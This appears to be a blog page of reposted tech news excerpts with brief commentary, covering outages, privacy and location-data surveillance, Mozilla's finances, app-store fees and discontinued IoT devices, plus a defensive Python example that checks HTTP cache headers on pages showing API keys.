Bloomberg suggests the recipient of that text message, “Executive 1,” is former CEO David Wenig, based on the similarity between a newsletter article quoted in the complaint, “eBay RICO Lawsuit Meant to Curb Seller Exodus to Amazon?” and an article with the same headline on the EcommerceBytes Blog that refers to Wenig.

The affidavit outlining the case cites text identical to the online article except that it replaces “eBay CEO” with “[Executive 1]”. Wenig has not been charged with any wrongdoing.

Source: Ex-eBay global intel staffers to admit they cyberstalked online tat bazaar’s critics – who got pig heads, funeral wreath, and more in the mail • The Register

A New Version of Microsoft Office Without a Subscription Launches in 2021

Subscriptions may be ideal for certain services such as Netflix, with its constant flow of new content, but for a suite of tools like Microsoft Office? Paying every month doesn’t suit everyone, especially if all they want is access to the word processor and spreadsheet. Thankfully, a new perpetual license edition of the suite arrives next year.

Microsoft clearly pushes an Office subscription as the best way to access its always up-to-date suite of tools and services, while those who just want to buy a copy outright and use it for years to come are still using Office 2019, which released back in 2018. It was unclear whether 2019 would ever be replaced, but as spotted by Windows Central, Microsoft quietly confirmed in a news post by the Exchange team that “Microsoft Office will also see a new perpetual release for both Windows and Mac, in the second half of 2021.”

There are no details yet regarding the name, price, or availability of this new version.

Source: A New Version of Microsoft Office Without a Subscription Launches in 2021 | PCMag

Spain’s highway agency is monitoring speeding hotspots using bulk phone location data – is that even allowed here?

Spain’s highways agency is using bulk mobile phone data for monitoring speeding hotspots, according to local reports.

Equipped with data on customers handed over by local mobile phone operators, Spain’s Directorate-General for Traffic (DGT) may be gathering data on “which roads and at what specific kilometer points the speed limits are usually exceeded,” according to Granadan newspaper Ideal (en español).

“In fact, Traffic has data on this since the end of last year when the National Statistics Institution (INE) reached an agreement with mobile operators to obtain information about the movements of citizens,” reported the paper.

The data-harvesting agreement was first signed late last year to coincide with a national census (as El Reg reported at the time) and is now being used to monitor drivers’ speeds.

National newspaper El Pais reported in October 2019 that the trial would involve dividing Spain “into 3,500 cells with a minimum of 5,000 people in each of them” with the locations of phones being sampled continuously between 9am and 6pm, with further location snapshots being taken at 12am and 6am.

The newspaper explained: “With this information it will be possible to know how many citizens move from a dormitory municipality to a city; how many people work in the same neighbourhood where you live or in a different one; where do the people who work in an area come from, or how the population fluctuates in a box throughout the day.”

The INE insisted that data collected back then had been anonymised and was “aimed at getting a better idea of where Spaniards go during the day and night”, as the BBC summarised the scheme. Mobile networks Vodafone, Movistar, and Orange were all said to be handing over user data to the INE, with the bulk information fetching €500,000 – a sum split between all three firms.

Let me interject here that it’s practically impossible to anonymise data – and location data is incredibly personal, private and dangerous, as seen when the US military had secret bases exposed.

In April the initiative was reactivated for the so-called DataCovid plan, where the same type of bulk location data was used to identify areas where Spaniards were ignoring COVID-19 lockdown laws.

“The goal is to analyse the effect which the (confinement) measures have had on people’s movements, and see if people’s movements across the land are increasing or decreasing,” Spain’s government said at the time, as reported by expat news service The Local’s Iberian offshoot.

The DGT then apparently hit on the idea of using speed data derived from cell tower pings (in the same way that Google Maps, Waze, and other online services derive average road speed and congestion information) to identify locations where drivers may have been breaking the speed limit.

The Ideal news website seemed to put the obvious fears to bed in its report of the traffic police initiative when it posed the obvious, rhetorical, question: whether drivers can be fined based on mobile data.

“The answer is clear and direct: it is not possible,” it concluded. “The DGT can only fine us through the fixed and mobile radars that it has installed throughout the country.”

While the direction of travel here seems obvious to anyone with any experience of living in a western country that implements this type of dragnet mass surveillance, so far there is little evidence of an explicit link between mobile phone data-slurping and speed cameras or fines.

Back in 2016, TfL ran a “trial” tracking people’s movements by analysing where their MAC addresses popped up within the Tube network, also hoping to use this data to get higher prices for advertising spots at busy areas inside Tube stations. Dedicated public Wi-Fi spots on train platforms are now a permanent fixture in all but a few of the London Underground stations. The service is operated by Virgin Media and is “free” to use for customers of the four mobile network operators, but collects your mobile number at the point of signing up.

And here you can see the ease with which mission creep comes out and people start using your data for all kinds of non-related things once they have it. This is why we shouldn’t allow governments or anyone else to get their grubby little hands on it and why we should be glad that at least at EU level, data privacy is taken seriously with GDPR and other laws.

Source: Spain’s highway agency is monitoring speeding hotspots using bulk phone location data • The Register

Twitter warns of possible API keys leak through browser caching

Twitter is notifying developers today about a possible security incident that may have impacted their accounts.

The incident was caused by incorrect instructions that the developer.twitter.com website sent to users’ browsers.

The developer.twitter.com website is the portal where developers manage their Twitter apps and attached API keys, but also the access token and secret key for their Twitter account.

In an email sent to developers today, Twitter said that its developer.twitter.com website told browsers to create and store copies of the API keys, account access token, and account secret inside their cache, a section of the browser where data is saved to speed up the process of loading the page when the user accessed the same site again.

This might not be a problem for developers using their own browsers, but Twitter is warning developers who may have used public or shared computers to access the developer.twitter.com website — in which case, their API keys are now most likely stored in those browsers.

“If someone who used the same computer after you in that temporary timeframe knew how to access a browser’s cache, and knew what to look for, it is possible they could have accessed the keys and tokens that you viewed,” Twitter said.

“Depending on what pages you visited and what information you looked at, this could have included your app’s consumer API keys, as well as the user access token and secret for your own Twitter account,” Twitter said.
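The Twitter notice turns on one detail of HTTP caching: a page can carry several headers that look like they disable caching and still be written to the browser's disk cache. The following Python, an added example that is not Twitter's code, checks a response's headers with the caching rules from RFC 7234/9111 and shows the corrected header set; the weak header set is constructed for illustration.

```python
"""Check whether an HTTP response carrying secrets may be written to a
browser cache, and show the header set that prevents it.

Header handling follows the HTTP caching rules (RFC 7234 / RFC 9111):
only the 'no-store' directive forbids a cache from storing the response.
'no-cache', 'private', 'max-age=0', 'must-revalidate', 'Pragma: no-cache'
and a past 'Expires' only force revalidation before reuse; the bytes still
land in the cache, which is the situation the Twitter notice describes.
"""
from typing import Dict, List, Tuple

Headers = List[Tuple[str, str]]  # response headers as (name, value) pairs


def header_values(headers: Headers, name: str) -> List[str]:
    """All values for a header, matched case-insensitively (HTTP allows repeats)."""
    return [v for n, v in headers if n.lower() == name.lower()]


def parse_cache_control(headers: Headers) -> Dict[str, str]:
    """Merge every Cache-Control header into {directive: argument-or-''}."""
    directives: Dict[str, str] = {}
    for value in header_values(headers, "Cache-Control"):
        for token in value.split(","):
            token = token.strip()
            if not token:
                continue
            name, _, arg = token.partition("=")
            directives[name.strip().lower()] = arg.strip().strip('"')
    return directives


def browser_may_store(headers: Headers) -> bool:
    """True if a browser cache is permitted to persist this response to disk."""
    return "no-store" not in parse_cache_control(headers)


def audit_secret_response(headers: Headers) -> List[str]:
    """Findings for a response that renders API keys or tokens.

    Returns an empty list when the headers are acceptable.
    """
    findings = []
    cc = parse_cache_control(headers)
    if "no-store" not in cc:
        findings.append("missing Cache-Control: no-store; response may be cached to disk")
    if "public" in cc:
        findings.append("Cache-Control: public allows shared caches to keep the response")
    if cc.get("max-age", "0") not in ("", "0"):
        findings.append(f"max-age={cc['max-age']} marks the secret as reusable without revalidation")
    # Pragma only affects reuse, never storage; flag it so the reader sees
    # why it is not a substitute for no-store.
    if header_values(headers, "Pragma") and "no-store" not in cc:
        findings.append("Pragma: no-cache does not prevent storing, only reuse")
    return findings


def harden(headers: Headers) -> Headers:
    """Return a copy of the headers with caching of the body forbidden."""
    kept = [(n, v) for n, v in headers
            if n.lower() not in ("cache-control", "pragma", "expires")]
    # 'no-store' is the one directive that obliges a cache not to write the
    # response at all; nothing else needs to accompany it.
    return kept + [("Cache-Control", "no-store")]


# Constructed example of a weak header set for a page that renders API keys.
# Every header here looks protective, yet none of them forbids storage.
WEAK_HEADERS: Headers = [
    ("Content-Type", "text/html; charset=utf-8"),
    ("Cache-Control", "private, max-age=0, must-revalidate"),
    ("Pragma", "no-cache"),
    ("Expires", "Thu, 01 Jan 1970 00:00:00 GMT"),
]

if __name__ == "__main__":
    print("weak :", browser_may_store(WEAK_HEADERS), audit_secret_response(WEAK_HEADERS))
    fixed = harden(WEAK_HEADERS)
    print("fixed:", browser_may_store(fixed), audit_secret_response(fixed))
```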

Source: Twitter warns of possible API keys leak | ZDNet

Apple backs down on taking 30% cut of paid online events on Facebook – for a few months

Facebook has temporarily shamed Apple out of taking a 30 percent cut of paid online events organized by small businesses and hosted on Facebook—things like cooking classes, workout sessions, and happy hours. Demand for these kinds of online events has soared during the COVID-19 pandemic.

Apple says that it has a longstanding policy that digital products must be purchased using Apple’s in-app payments system—and hence pay Apple’s 30 percent tax. In contrast, companies selling physical goods and services are not only allowed but required to use other payment methods (options here include Apple Pay, which doesn’t take such a big cut).

For example, an in-person cooking class is not a digital product, so a business selling cooking class tickets via an iPhone app wouldn’t have to give Apple a 30 percent cut. But if the same business offers a virtual cooking class, Apple considers that to be a digital product and demands a 30 percent cut—at least if the customer pays for the class using an iOS device.

Last month, Facebook announced it would start offering a new feature for small businesses to host paid online events. Facebook has waived any fees for the first year, allowing small businesses to pocket 100 percent of the revenue. But Apple refused to budge on its 30 percent take.

The issue came to a head in late August when Facebook revealed that Apple wouldn’t even allow Facebook to inform users about Apple’s 30 percent take. Facebook wanted to have a message on the checkout screen that said “Apple takes 30 percent of this purchase.” But Apple deemed this message “irrelevant” and forced Facebook to remove it before approving Facebook’s update.

The reprieve is only temporary. Apple says it has given Facebook until the end of the year to switch from Facebook Pay to in-app purchases—and hence start paying Apple 30 percent—for online events. Apple is extending the same courtesy to Airbnb and ClassPass.

However, this grace period isn’t available for Gaming Creators, which Apple argues are not brick-and-mortar businesses that have been affected by COVID-19.

Source: Apple backs down on taking 30% cut of paid online events on Facebook | Ars Technica

Yay! Monopolies bitch slapping each other a little bit

It’s Not Just You, a Ton of Google Services Just Went Down between 2100 – 2230

If you’ve been experiencing issues trying to access Google or YouTube, you’re not alone. Around 9 p.m. ET on Thursday evening, tons of users worldwide reported problems with Google and the many services under the tech giant’s umbrella, including Google Drive, Gmail, Stadia, the Play Store, and even Nest.

Some, such as Gmail, were taking significantly more time to load while other services like Google’s Play Store and Calendar seemed to be on an endless boot-up loop and wouldn’t load at all. DownDetector currently shows outages for just about all of Google’s services in areas all over the world. According to the site, the bulk of reports are coming from Australia, the U.S., and east Asia, with users primarily having issues logging in.

We’ve reached out to Google for more info. Honestly, a worldwide Google outage is absolutely on-brand for the year we’re having so far, so I’m hardly surprised.

Update: 9/24/2020; 11:17 p.m. ET: Luckily, the problem appears to have been short-lived. An update from Google’s Cloud status dashboard showed that the issue had been resolved “for most traffic” across Google’s services shortly after 10:30 p.m. ET.

Source: It’s Not Just You, a Ton of Google Services Just Went Down (Update: Phew, They’re Back Up)

Yay, cloud

Cambridge Analytica boss disqualified from running a company for 7 years

Alexander James Ashburner Nix (45), from Holland Park, West London, has signed a disqualification undertaking, accepted by the Secretary of State on 14 September 2020.

Within the undertaking, Alexander Nix did not dispute that he caused or permitted SCL Elections Ltd or associated companies to market themselves as offering potentially unethical services to prospective clients; demonstrating a lack of commercial probity.

Effective from 5 October 2020, Alexander Nix is disqualified for seven years from acting as a director or directly or indirectly becoming involved, without the permission of the court, in the promotion, formation or management of a company.

Alexander Nix was a director of SCL Elections Ltd, a company that provided data analytics, marketing and communication services to political and commercial customers. He was also a director of five other connected UK companies: SCL Group Ltd, SCL Social Ltd, SCL Analytics Ltd, SCL Commercial Ltd, and Cambridge Analytica (UK) Ltd.

From 2016, SCL Elections Ltd was included in a rebranding of associated companies which then operated under the trading names Cambridge Analytica, CA Political (Global) and CA Commercial.

SCL Elections and the five connected companies, however, ceased trading following allegations in the UK and United States media which created substantial adverse publicity.

Some of the accusations against the companies related to allegedly offering potential clients unethical services.

All six companies entered into administration in May 2018 before entering into compulsory liquidation in April 2019. The companies’ insolvencies brought them to the attention of the Insolvency Service, who conducted investigations into the conduct of the directors.

Investigators’ enquiries confirmed that Alexander Nix had caused or permitted SCL Elections or associated companies to act with a lack of commercial probity.

The unethical services offered by the companies included bribery or honey trap stings, voter disengagement campaigns, obtaining information to discredit political opponents and spreading information anonymously in political campaigns.

Source: 7-year disqualification for Cambridge Analytica boss – GOV.UK

Looks Like the Windows XP Source Code Just Leaked on 4chan

Would you believe more than 1% of computers worldwide are still using Windows XP? Incredibly, there are still millions of people using the 19-year-old operating system. And a recent development — if it bears out — is another reason people need to make the switch to something newer.

On Thursday, users on 4chan posted what they claimed was the source code of Windows XP.

Posting an image of a screenshot allegedly of the source code in front of Windows XP’s iconic Bliss background, one user wrote ‘sooooo Windows XP Source code leaked’. Another Redditor helpfully has uploaded the code as a torrent, assisting in its spread.

While there is no confirmation that this code is definitely Windows XP, independent researchers have begun to pick through the source code and believe it stands up to scrutiny.

[…]

 

Source: Looks Like the Windows XP Source Code Just Leaked on 4chan

Tesla network goes down leaving drivers unable to connect to their cars with mobile app in massive outage – yay cloud

TESLA’s network completely dropped on Wednesday in a massive outage that left drivers unable to connect to their cars.

According to Electrek, internal systems were fully down at around 11am ET, leaving users unable to connect their vehicles to the mobile app.

Tesla users were unable to connect their cars to their mobile apps on Wednesday. Credit: EPA

Tesla staff were also unable “to process deliveries and orders” and the company’s website wasn’t working.

The outage also hit Tesla solar and Powerwall, the company’s in-home batteries.

Around noon ET, connectivity was reportedly returning for some users’ cars, the news outlet reported.

The outage – which appeared to be global – is said to be one of the “most wide-ranging” in Tesla’s history.

The network outage was said to be one of the ‘most wide-ranging’ in Tesla’s history. Credit: Getty Images

CEO Elon Musk did not immediately comment on what happened.

Source: Tesla network goes down leaving drivers unable to connect to their cars with mobile app in massive outage

ISS Maneuvers to Avoid Space Debris, in What’s Becoming the New Normal

Yesterday, NASA and Russian flight controllers performed an “avoidance maneuver” to protect the International Space Station from a wayward chunk of space debris. This episode—already the third of its kind this year—highlights a growing problem and the importance of mitigating potential collisions in space.

Low Earth orbit (LEO) is vast and mostly empty, but when you have thousands upon thousands of objects zipping around at speeds over 6 miles per second (10 km/s), this space in space suddenly seems a lot smaller.

Such was the concern earlier this week when NASA, along with U.S. Space Command, detected an unknown piece of space debris that was expected to come uncomfortably close to the International Space Station. To safeguard the outpost and its crew, NASA and Russian flight controllers scheduled an impromptu “avoidance maneuver” to place the ISS out of harm’s way.

To do so, they fired thrusters belonging to Russia’s Progress 75 resupply spacecraft, which is currently docked to the Zvezda service module. Given the late notice, mission controllers had all three members of the Expedition 63 crew—Chris Cassidy, Anatoly Ivanishin, and Ivan Vagner—temporarily relocate to the Russian segment so they could be in close proximity to the Soyuz MS-16 spacecraft. NASA said this was done “out of an abundance of caution” and that “at no time was the crew in any danger.”

The piece of space junk was projected to pass to within 0.86 miles (1.39 kilometers) of the International Space Station, with the closest approach happening on Tuesday, September 22 at 6:21 pm EDT. The avoidance maneuver, which required just 150 seconds to complete, was performed about an hour earlier. NASA and Russian flight controllers worked in tandem to make it happen.

Once it was all over, the hatches between the U.S. and Russian segments were reopened and life resumed to normal.

Source: ISS Maneuvers to Avoid Space Debris, in What’s Becoming the New Normal

Firefox usage is down 85% despite Mozilla’s top exec pay going up 400%

Mozilla recently announced that they would be dismissing 250 people. That’s a quarter of their workforce so there are some deep cuts to their work too. The victims include: the MDN docs (those are the web standards docs everyone likes better than w3schools), the Rust compiler and even some cuts to Firefox development. Like most people I want to see Mozilla do well but those three projects comprise pretty much what I think of as the whole point of Mozilla, so this news is a big let down.

The stated reason for the cuts is falling income. Mozilla largely relies on “royalties” for funding. In return for payment, Mozilla allows big technology companies to choose the default search engine in Firefox – the technology companies are ultimately paying to increase the number of searches Firefox users make with them. Mozilla haven’t been particularly transparent about why these royalties are being reduced, except to blame the coronavirus.

I’m sure the coronavirus is not a great help but I suspect the bigger problem is that Firefox’s market share is now a tiny fraction of its previous size and so the royalties will be smaller too – fewer users, so fewer searches and therefore less money for Mozilla.

The real problem is not the royalty cuts, though. Mozilla has already received more than enough money to set themselves up for financial independence. Mozilla received up to half a billion dollars a year (each year!) for many years. The real problem is that Mozilla didn’t use that money to achieve financial independence and instead just spent it each year, doing the organisational equivalent of living hand-to-mouth.

Despite their slightly contrived legal structure as a non-profit that owns a for-profit, Mozilla are an NGO just like any other. In this article I want to apply the traditional measures that are applied to other NGOs to Mozilla in order to show what’s wrong.

These three measures are: overheads, ethics and results.

Overheads

One of the most popular and most intuitive ways to evaluate an NGO is to judge how much of their spending is on their programme of works (or “mission”) and how much is on other things, like administration and fundraising. If you give money to a charity for feeding people in the third world you hope that most of the money you give them goes on food – and not, for example, on company cars for head office staff.

Mozilla looks bad when considered in this light. Fully 30% of all expenditure goes on administration. Charity Navigator, an organisation that measures NGO effectiveness, would give them zero out of ten on the relevant metric. For context, to achieve 5/10 on that measure Mozilla admin would need to be under 25% of spending and, for 10/10, under 15%.

Senior executives have also done very well for themselves. Mitchell Baker, Mozilla’s top executive, was paid $2.4m in 2018, a sum I personally think of as instant inter-generational wealth. Payments to Baker have more than doubled in the last five years.

As far as I can find, there is no UK-based NGO whose top executive makes more than £1m ($1.3m) a year. The UK certainly has its fair share of big international NGOs – many much bigger and more significant than Mozilla.

I’m aware that some people dislike overheads as a measure and argue that it’s possible for administration spending to increase effectiveness. I think it’s hard to argue that Mozilla’s overheads are correlated with any improvement in effectiveness.

Ethics

Mozilla now thinks of itself less as a custodian of the old Netscape suite and more as a ‘privacy NGO’. One slogan inside Mozilla is: “Beyond the Browser”.

Regardless of how they view themselves, most of their income comes from helping to direct traffic to Google by making that search engine the default in Firefox. Google make money off that traffic via a big targeted advertising system that tracks people across the web and largely without their consent. Indeed, one of the reasons this income is falling is because as Firefox’s usage falls less traffic is being directed Google’s way and so Google will pay less.

There is, as yet, no outbreak of agreement among the moral philosophers as to a universal code of ethics. However I think most people would recognise hypocrisy in Mozilla’s relationship with Google. Beyond the ethical problems, the relationship certainly seems to create conflicts of interest. Anyone would think that a privacy NGO would build anti-tracking countermeasures into their browser right from the start. In fact, this was only added relatively recently (in 2019), after both Apple (in 2017) and Brave (since release) paved the way. It certainly seems like Mozilla’s status as a Google vassal has played a role in the absence of anti-tracking features in Firefox for so long.

Another ethical issue is Mozilla’s big new initiative to move into VPNs. This doesn’t make a lot of sense from a privacy point of view. Broadly speaking: VPNs are not a useful privacy tool for people browsing the web. A VPN lets you access the internet through a proxy – so your requests superficially appear to come from somewhere other than they really do. This does nothing to address the main privacy problem for web users: that they are being passively tracked and de-anonymised on a massive scale by the baddies at Google and elsewhere. This tracking happens regardless of IP address.

When I tested Firefox through Mozilla VPN (a rebrand of Mullvad VPN) I found that I could be de-anonymised by browser fingerprinting – already a fairly widespread technique by which various elements of your browser are examined to create a “fingerprint” which can then be used to re-identify you later. Firefox, unlike some other browsers, does not include any countermeasures against this.

Even when using Mozilla’s “secure and private” VPN, Firefox is trackable by browser fingerprinting, as demonstrated by the EFF’s Panopticlick tool. Other browsers use randomised fingerprints as a countermeasure against this tracking.

Another worry is that many of these privacy-focused VPN services have a nasty habit of turning out to keep copious logs on user behaviour. A few months ago, in a massive breach, several “no log” VPN services inadvertently released terabytes of private user data that they had promised not to collect. VPN services are in a great position to eavesdrop – and even if they promise not to, your only option is to take them at their word.

Results

I’ve discussed the Mozilla chair’s impressive pay: $2.4m/year. Surely such impressive pay is justified by the equally impressive results Mozilla has achieved? Sadly on almost every measure of results both quantitative and qualitative, Mozilla is a dog.

Firefox is now so niche it is in danger of garnering a cult following: it has just 4% market share, down from 30% a decade ago. Mobile browsing numbers are bleak: Firefox barely exists on phones, with a market share of less than half a percent. This is baffling given that mobile Firefox has a rare feature for a mobile browser: it’s able to install extensions and so can block ads.

Yet despite the problems within their core business, Mozilla, instead of retrenching, has diversified rapidly. In recent years Mozilla has created:

  • a mobile app for making websites
  • a federated identity system
  • a large file transfer service
  • a password manager
  • an internet-of-things framework/standard
  • an email relay service
  • a completely new phone operating system
  • an AI division (but of course)
  • and spent $25 million buying the reading list management startup, Pocket

Many of the above are now abandoned.

Sadly Mozilla’s annual report doesn’t break down expenses on a per-project basis so it’s impossible to know how much of the spending that is on Mozilla’s programme is being spent on Firefox and how much is being spent on all these other side-projects.

What you can at least infer is that the side-projects are expensive. Software development always is. Each of the projects named above (and all the other ones that were never announced or that I don’t know about) will have required business analysts, designers, user researchers, developers, testers and all the other people you need in order to create a consumer web project.

The biggest cost of course is the opportunity cost of just spending that money on other stuff – or nothing: it could have been invested to build an endowment. Now Mozilla is in the situation where apparently there isn’t enough money left to fully fund Firefox development.

What now?

Mozilla can’t just continue as before. At the very least they need to reduce their expenses to go along with their now reduced income. That income is probably still pretty enormous though: likely hundreds of millions a year.

I’m a Firefox user (and one of the few on mobile, apparently) and I want to see Mozilla succeed. As such, I would hope that Mozilla would cut their cost of administration. I’d also hope that they’d increase spending on Firefox to make it faster and implement those privacy features that other browsers have. Most importantly: I’d like them to start building proper financial independence.

I doubt those things will happen. Instead they will likely keep the expensive management. They have already cut spending on Firefox. Their great hope is to continue trying new things, like using their brand to sell VPN services that, as I’ve discussed, do not solve the problem that their users have.

Instead of diversifying into yet more products and services Mozilla should probably just ask their users for money. For many years the Guardian newspaper (a similarly sized organisation to Mozilla in terms of staff) was a financial basket case. The Guardian started asking their readers for money a few years ago and seems to be on firmer financial footing since.

Getting money directly has also helped align the incentives of their organisation with those of their readers. Perhaps that would work for Mozilla. But then, things are different at the Guardian. Their chief exec makes a mere £360,000 a year.

Source: Firefox usage is down 85% despite Mozilla’s top exec pay going up 400%

MS Edge and Google Chrome are winning the renewed browser wars and this kind of financial playing isn’t helping Firefox, who I really want to win on ethical considerations. It’s just not helping.

Samsung Is Rolling Out Its ECG App to Its Smartwatches Today – and only for Samsung phone owners

Samsung may have first made an ECG-capable smartwatch with the Galaxy Watch Active2, but it wasn’t until earlier this summer that it actually got clearance from the U.S. Food and Drug Administration to enable the medical-grade feature. That announcement came in dramatic fashion at its Unpacked event in August, where the company unveiled yet another ECG-capable smartwatch, the excellent Galaxy Watch 3. Still, even with clearance, we didn’t know exactly when the ECG feature would be available on either watch. Well, the answer is today.

“Beginning September 23, users will have access to yet another next-generation feature, as on-demand electrocardiogram (ECG) readings come to Galaxy Watch 3 and Galaxy Watch Active2,” Samsung said in a press statement. “This tool recently received clearance from the U.S. Food and Drug Administration (FDA) and will soon be available through the Samsung Health Monitor app when connected to a compatible Galaxy smartphone.”

It appears that Samsung’s ECG app will operate similarly to Apple’s. After opening the Samsung Health Monitor app, you’ll be advised to put your arm on a flat surface and place your finger on the top button. The watch will identify you as having either a normal sinus rhythm or atrial fibrillation. Once the reading is done, you can log symptoms like dizziness or fatigue. (Atrial fibrillation is often unaccompanied by symptoms.) You’ll also be able to send a PDF report to your healthcare provider.

The catch here is that, at least for now, the ECG app will only be available on Samsung Galaxy phones with Android Nougat or higher—meaning, if you have one of these watches paired to a non-Samsung Android phone or an iPhone, you’re out of luck. That’s only sort of surprising. While Samsung’s smartwatches are among the best currently available for Android users, Samsung is like Apple in that it likes to push its own ecosystem. As a result, some features are only available to Samsung phone owners. It looks like, for the time being, ECG is one of them.


Gizmodo reached out to Samsung to see if this feature might eventually make its way to non-Samsung Android phones. In response, a Samsung spokesperson said, “We’re always looking to address consumer feedback, however we cannot speak to additional phone compatibility outside of Galaxy smartphones at this time.”

While it’s great that Samsung’s ECG app is finally here, it is majorly disappointing that not all Android users will be able to access it. That means currently, in the U.S. only Apple and Samsung smartwatch owners have access to any sort of on-the-wrist ECG. The Galaxy Watch 3 felt like a real win for all Android users, but leaving non-Samsung Android users out of this update takes the shine off that a bit. Hopefully, Samsung will fix that going forward.

For non-Samsung Android users, the only FDA-cleared ECG smartwatch is the newly launched Fitbit Sense. However, Fitbit only just got clearance, meaning the ECG feature on the Sense is not live yet. You’ll have to wait until next month before it’s available. The good news is that Fitbit is platform-agnostic. Provided that there aren’t any delays, this means you’ll have at least one FDA-cleared ECG smartwatch option, regardless of what phone you use.

Source: Samsung Is Rolling Out Its ECG App to Its Smartwatches Today

Adidas now stands for All Day I’m Disconnecting All Servers as owners of ‘smart’ Libra scales furious over bricked kit – don’t trust stuff that needs cloud

In 2015, German sportswear manufacturer Adidas acquired a plucky Austrian IoT startup called Runtastic, which, among other things, manufactured a $129.99 “smart” scale called Libra. Now that product is being discontinued, preventing owners from synchronising their data or even downloading the app required to use it.

In a post published yesterday, Adidas announced the discontinuation of key functionality from the Libra smart scale.

“We wanted to let you know that we’ve decided to stop supporting the Libra app. This means that we’ve taken the app off the market and that login won’t work anymore,” the company said. “A login and the synchronisation of your weight data from the Libra scale is no longer possible.”

Owners can still see how much timber they’ve put on during lockdown by glancing at the Libra’s LCD screen, much like they could with an ordinary £10 scale from Tesco. However, the core functionality that initially attracted them to the product is long gone.

While the Libra app is no longer searchable on the Google Play Store and Apple App Store, those who have previously downloaded it are able to visit its page, where they can still leave “feedback”. Predictably, this has prompted a flood of one-star reviews and furious comments.

El Reg has contacted Adidas for comment.

Users of Libra are not alone in having their expensive IoT kit discontinued after just a few years of ownership.

In April 2016, the servers supporting a smart home hub product called Revolv were shut down, leaving owners unable to control their other Wi-Fi-connected gizmos. This stung for a couple of reasons: firstly, the hub cost £210 and was explicitly sold with a “lifetime subscription”. Secondly, Revolv wasn’t a fledgling startup with tenuous cash flow, but rather a subsidiary of Alphabet – one of the largest and wealthiest companies on the planet.

Another shocking example comes from last year, when Den Automation, a crowdfunding sensation that raised $4.5m in equity crowdfunding for a family of smart plugs and light switches, entered administration. As it found itself unable to pay for server costs, people suddenly found themselves burdened with non-functional and hugely expensive kit.

The assets and intellectual property of Den Automation were subsequently acquired by a previous investor through a new company called Den Switches, which has said it intends to restart the service. It’s not clear when that will happen.

More recently, the Will.i.am-owned startup Wink sent out an email to users of its smart home products demanding they pay for a subscription service in order to continue using their products as the revenue obtained from one-time purchases of its equipment proved insufficient to support long-term maintenance.

The problem with most IoT products isn’t necessarily that they rely on back-end servers to run. It’s that, for the most part, it’s impossible to perceive the trajectory of a given company. Will they be acquired by new owners with aggressive cost-cutting strategies and leaner product roadmaps?

Or will they financially struggle, eventually swirling the toilet basin of insolvency, and leave nothing behind but a bunch of electronic waste and angry one-star app reviews?

Source: Adidas now stands for All Day I’m Disconnecting All Servers as owners of ‘smart’ Libra scales furious over bricked kit • The Register